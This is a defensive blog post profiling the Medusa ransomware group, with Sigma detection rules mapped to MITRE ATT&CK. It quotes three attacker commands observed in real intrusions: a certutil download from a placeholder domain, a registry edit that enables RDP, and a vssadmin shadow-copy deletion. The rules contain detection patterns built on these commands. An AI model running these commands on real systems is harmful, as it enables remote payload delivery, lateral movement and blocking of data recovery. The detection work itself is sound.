Ransomware Series #4 - Medusa
A brief profile on Medusa Ransomware w/ Sample Detection Rules
Welcome to the fourth entry in the Ransomware Group series! Just like before, we’ll start with some quick background information on the threat group and include links to more detailed analysis. Then we’ll dive into some tactics, techniques, and procedures (TTPs) mapped to the MITRE ATT&CK framework — along with basic detection strategies (Sigma rules).
Past entries in this series:
Reminder: It goes without saying that a holistic security program is needed and defense-in-depth strategies should be followed. I’ll be focusing more on detection strategies since these often get overlooked.
What is Medusa?
Medusa is a Ransomware-as-a-Service (RaaS) operation that first emerged in June 2021. Since then, it has steadily gained notoriety due to its high-impact attacks on critical infrastructure and victims from all over the world - including an Australian Cancer Center, a UK High School, and Minneapolis Public Schools. Medusa actors typically exploit publicly accessible services or use compromised credentials to gain initial access. Once inside, they exfiltrate sensitive data to maximize their leverage and then deploy ransomware rapidly, almost always threatening to release the stolen data unless the victim pays a fee.
Medusa Ransomware is now seen as an emerging threat, causing CISA to release a Joint Advisory on March 12th warning all groups to be aware of their operation. What makes them dangerous is that they are seen as opportunistic, meaning no industry is off-limits for an attack - including healthcare and critical infrastructure. Additionally, they operate a leak site known as the "Medusa Blog," where they publicly shame and threaten victims who refuse to pay.
Feel free to check out the advisory for more analysis and IOCs:
MITRE ATT&CK TTPs & Detection Strategies
We’ll walk through some observed techniques used by Medusa and map them to the MITRE ATT&CK framework. Each section includes detection strategies and rule examples. Just a reminder, any new rules should be tested and tuned before getting implemented in a production environment.
If you need a quick primer on Sigma rules/the Sigma project, see my previous post about it here:
A Brief Overview of Sigma
If you've read any of my posts, you've noticed that I'm a big proponent of the Sigma project. Whenever I set out to write detection rules, I do so in this format.
Defense Evasion
Obfuscated Files or Information – T1027
Medusa actors use Living-off-the-Land (LOTL or LOL) techniques to bypass security monitoring, often using built-in/legitimate Windows utilities to carry out their desired actions. This includes using ‘certutil.exe’ with the ‘urlcache’ parameter to download files remotely:
cmd.exe /c certutil -f urlcache https://<domain>/<remotefile>.css <localfile>.dllFor more information on certutil.exe and other LOL binaries, see the LOLBAS project here:
https://lolbas-project.github.io
Detection Strategy: Look for the execution of ‘certutil.exe’ with command-line containing ‘urlcache’ and ‘http’ - luckily for us the Sigma project already has an existing rule for this:
title: Suspicious Download Via Certutil.EXE
id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b
related:
- id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829
type: similar
status: test
description: Detects the execution of certutil with certain flags that allow the utility to download files.
references:
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
- https://forensicitguy.github.io/agenttesla-vba-certutil-download/
- https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/
- https://lolbas-project.github.io/lolbas/Binaries/Certutil/
author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
date: 2023-02-15
tags:
- attack.defense-evasion
- attack.t1027
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\certutil.exe'
- OriginalFileName: 'CertUtil.exe'
selection_flags:
CommandLine|contains:
- 'urlcache '
- 'verifyctl '
selection_http:
CommandLine|contains: 'http'
condition: all of selection_*
falsepositives:
- Unknown
level: mediumLateral Movement
Remote Services: Remote Desktop Protocol – T1021.001
Medusa actors use RDP to move laterally throughout the network, including enabling it through the registry like this:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /fDetection Strategy: Look for the execution of ‘reg.exe’ with command-line containing the targeted registry keys for RDP - here is another existing Sigma rule for this (note: this Sigma rule is a good starting point and would alert on the command entered above, however, consider deploying sysmon and monitoring for ‘Registry_Set’ events that target this registry key as it will catch changes via the Registry Editor as well):
title: Potential Tampering With RDP Related Registry Keys Via Reg.EXE
id: 0d5675be-bc88-4172-86d3-1e96a4476536
status: test
description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values
references:
- https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
author: pH-T (Nextron Systems), @Kostastsale, TheDFIRReport
date: 2022-02-12
modified: 2023-02-05
tags:
- attack.defense-evasion
- attack.lateral-movement
- attack.t1021.001
- attack.t1112
logsource:
product: windows
category: process_creation
detection:
selection_main_img:
- Image|endswith: '\reg.exe'
- OriginalFileName: 'reg.exe'
selection_main_cli:
CommandLine|contains|all:
- ' add '
- '\CurrentControlSet\Control\Terminal Server'
- 'REG_DWORD'
- ' /f'
selection_values_1:
CommandLine|contains|all:
- 'Licensing Core'
- 'EnableConcurrentSessions'
selection_values_2:
CommandLine|contains:
- 'WinStations\RDP-Tcp'
- 'MaxInstanceCount'
- 'fEnableWinStation'
- 'TSUserEnabled'
- 'TSEnabled'
- 'TSAppCompat'
- 'IdleWinStationPoolCount'
- 'TSAdvertise'
- 'AllowTSConnections'
- 'fSingleSessionPerUser'
- 'fDenyTSConnections'
condition: all of selection_main_* and 1 of selection_values_*
falsepositives:
- Unknown
level: highImpact
Inhibit System Recovery – T1490
Deleting shadow copies to prevent recovery is standard ransomware behavior, and Medusa is no exception. Medusa has been observed doing this via the vssadmin utility:
vssadmin.exe Delete Shadows /all /quietDetection Strategy: Look for the execution of ‘vssadmin.exe’ with command-line containing ‘delete’ and ‘shadow’ - here is another existing Sigma rule for this:
title: Shadow Copies Deletion Using Operating Systems Utilities
id: c947b146-0abc-4c87-9c64-b17e9d7274a2
status: stable
description: Shadow Copies deletion using operating systems utilities
references:
- https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
- https://blog.talosintelligence.com/2017/05/wannacry.html
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/
- https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/
- https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100
- https://github.com/Neo23x0/Raccine#the-process
- https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar
- https://redcanary.com/blog/intelligence-insights-october-2021/
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware
author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)
date: 2019-10-22
modified: 2022-11-03
tags:
- attack.defense-evasion
- attack.impact
- attack.t1070
- attack.t1490
logsource:
category: process_creation
product: windows
detection:
selection1_img:
- Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
- '\wmic.exe'
- '\vssadmin.exe'
- '\diskshadow.exe'
- OriginalFileName:
- 'PowerShell.EXE'
- 'pwsh.dll'
- 'wmic.exe'
- 'VSSADMIN.EXE'
- 'diskshadow.exe'
selection1_cli:
CommandLine|contains|all:
- 'shadow' # will match "delete shadows" and "shadowcopy delete" and "shadowstorage"
- 'delete'
selection2_img:
- Image|endswith: '\wbadmin.exe'
- OriginalFileName: 'WBADMIN.EXE'
selection2_cli:
CommandLine|contains|all:
- 'delete'
- 'catalog'
- 'quiet' # will match -quiet or /quiet
selection3_img:
- Image|endswith: '\vssadmin.exe'
- OriginalFileName: 'VSSADMIN.EXE'
selection3_cli:
CommandLine|contains|all:
- 'resize'
- 'shadowstorage'
CommandLine|contains:
- 'unbounded'
- '/MaxSize='
condition: (all of selection1*) or (all of selection2*) or (all of selection3*)
fields:
- CommandLine
- ParentCommandLine
falsepositives:
- Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason
- LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)
level: highClosing Thoughts
Medusa continues the trend of increasingly professionalized RaaS groups targeting critical infrastructure. As defenders, our best chance at disrupting these operations lies in proactive detection engineering, layered defense, and rigorous logging and monitoring.
As always, test detection rules thoroughly and tailor them to your environment. Stay safe out there!